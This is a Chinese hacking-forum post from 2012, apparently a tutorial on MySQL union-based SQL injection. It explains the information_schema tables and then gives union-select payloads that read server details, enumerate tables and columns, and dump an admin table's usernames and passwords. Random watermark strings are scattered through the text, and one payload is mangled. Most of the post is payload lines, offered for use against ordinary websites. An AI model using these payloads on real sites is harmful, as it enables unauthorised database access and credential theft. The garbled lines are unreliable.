中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
8 t9 H9 o& D+ z1 b- i- ~% R# j" ]
学习盲注前先了解下 IFORMATION_SCHEMA 库
& `9 }  A4 H% s7 V/ y3 D" U0 |1 _' b4 p
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
6 d$ r% o* |- l存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。" F" G9 r2 g; m0 k
1.得到所有数据库名:! f$ @1 z; @7 y& l" i9 a$ `6 @
|SCHEMATA ->存储数据库名的表
' e) `1 v1 K  f|---字段:SCHEMA_NAME ->数据库名称
# F# O0 g" s7 ~1 J; v+ N+ n4 v, h7 e9 @& G5 [
|TABLES ->存储表名
, ~$ O3 u: h' b# k# m6 P% ~! N|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
- s( n3 z3 a* K/ g  S6 z, Y& t|---字段:TABLE_NAME ->存储表的表名% |3 ^% b  Z. h% V  q1 F
! r* k. I1 Z' z- P' v8 l
|COLUMNS ->存储的字段名表
/ P, L/ y( [( `) u2 x|---字段:TABLE_SCHEMA ->该字段所属数据库名
, w2 Q% C( ?3 J" R/ H% M) C|---字段:TABLE_NAME ->存储所属表的名称
* q4 X% H- E* o# ^; \: r0 Q; H# u9 P/ _
|---字段:COLUMN_NAME ->该字段的名称
# F3 r* v9 v1 U% _
, f  d. i. A1 L& `
- V) I  X- y2 h5 t" ?
! W7 F) n% s: t###########################################################################
: T# U' X+ L$ O9 O- @" `4 V$ ?
& K3 y! g* f1 F' I+ F0x001 获取系统信息:; v' \* q6 @: W  }0 G
  E) X6 Q. D% q- c: z' u+ q
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
" m/ v$ [5 W% U# o; s* q; b
; Q' }1 o; X: ^" W( v+ y/*
- w2 F* ?+ F! L3 [  A! A0 |7 u& T5 P! r8 @* L" l
@@global.version_compile_os 获取系统版本8 p7 d/ @. J& s3 H8 w& t
: O) a! \) d! {3 j, G8 h
@@datadir 数据库路径
( b" y1 S; x, S. Vdatabase() 当前数据库名称
+ j2 U) G0 L0 T6 O; V0x3c62723e 换行HEX值
& c4 v: H# U+ s* g
/ `0 K$ x& \& ?' \*/. S7 P. ^6 K5 \4 O2 I

$ e: V; I  ^% t* _# E: T
* j( ^& s; e, _' C+ p) J7 p0 \0 ]/ D. [: g' O8 s7 @
######################################################################
& ]+ r5 e9 m/ v. Y7 b  N- \' q7 z" ?6 ^1 J
0x002 获取表名' C$ L# b4 \+ M0 _9 b+ S

" `0 M6 p, a- funion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*' R5 K# s* [* w5 f4 f8 k' M

3 g) X7 P: w) z1 R
; X0 \; ^) x7 ?& ~  k
) b0 K# }% N& Q( f/*: f9 z& r1 d! r! D& a

/ ^" T4 c. [3 y% J- I0x67617264656e 为当前数据库名8 A2 O( `+ j. w
/ [& G8 q6 s6 L' D. Z, J# \- v
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
9 [2 h4 B$ _5 I3 W# t0 G+ ^! g( o- p
*/
2 _) I) J; ~: C) P" N  r2 i8 x
! ~! `& y; `3 Q######################################################################5 H9 t% [4 z1 d
( \& n: w& s4 V0 X" G
% C" m( {; V4 L& E: b4 @- O
* _: k& N! d( O% e3 B# C7 e
0x003 获取字段
$ a) Q! t/ W6 L% D4 _, r! \
6 M* G7 G0 g$ p  ^  x4 Q6 ]. ?union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*4 J) q0 d, s5 i- x6 Y
+ j  |: w9 q! g' F3 z# d
/*$ p) t  K/ @9 i) B; c/ y0 R

+ C, [+ R8 \8 t8 |group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
2 R  S* q0 ^3 \
* d2 g2 i0 i  A0x61646d696e ->选择一个表  C& z0 U4 ~, n1 t' u# d/ q& p
* p9 q# J' p; d# u' [% j( ?: H
0x67617264656e ->数据库名
! k4 q) }; E8 E8 I3 }" P* C' v
' o% ]$ S% n# t* z( J*/5 [7 s8 `5 o! a& j* l
, ]. I; H9 f7 r3 W. o
#####################################################################! A7 ]4 S0 M5 X( w/ v

4 q5 ~( @* B' f5 Y  W6 Q
) ?# x0 v7 i/ o9 `: V# n  H) e) }, W$ A& f- M, Z  z, C4 J2 V
0x004 获取数据
7 a5 [6 f/ k1 g: X* w/ t5 {* H8 R9 o1 y/ r4 K1 x* C
union select 1,2,32 k: U9 W5 F: B: L& A. ]; _
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin7 R- L5 L2 H( x$ y' F! z

5 {7 j2 G1 m- a0 U9 ^; R$ m' `union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
+ N% J0 ]$ h  D, U  |' ^# B2 x# ]5 L- \

: J: i; [% g0 d& {, K) @3 Q5 w% N; |1 k1 y7 \3 E( O
/*: ], o, v& U& D' w  A
9 D+ \4 j0 Y) `" s
0x3c62723e 换行符号HEX编码
' t% X$ Z3 x/ k8 H8 \
# ?, F! G& M; X2 }( f. \: agroup_concat 同时获得该字段所有数据
$ Y9 @: i2 ]% m, |( c4 t, d9 [5 ], `' E7 v2 H3 s
*/% V2 h7 A) q! A6 c8 ]! |, ^' P
2 h! S$ T  ^/ y% @





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2